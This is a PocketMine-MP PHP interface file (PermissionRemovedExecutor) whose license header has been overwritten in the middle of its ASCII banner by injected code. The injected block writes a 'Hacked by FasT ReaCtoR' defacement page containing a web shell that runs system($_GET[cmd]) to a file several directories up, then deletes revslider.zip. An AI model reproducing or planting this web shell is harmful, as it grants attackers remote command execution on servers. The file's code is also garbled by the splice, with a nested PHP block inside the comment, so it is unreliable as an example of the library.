<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
<?php 
error_reporting(0);

$file  = '<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}</style><title>Hacked by FasT ReaCtoR</title><center><div id=q>Hacked by FasT ReaCtoR<br>
<?php system("$_GET[cmd]");echo "<br>O_O";exit; ?>';
$r=fopen("../../../../../../Gass.php", "w");fwrite($r,$file);fclose($r);
$r=fopen("x.php", "w");fwrite($r,"");fclose($r);
system ("rm ../revslider.zip");
if(file_exists("x.php")) unlink("x.php");

?>
?> Hacked by Fallag Gassrini
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\permission;

interface PermissionRemovedExecutor{

	/**
	 * @return void
	 */
	public function attachmentRemoved(PermissionAttachment $attachment);
}
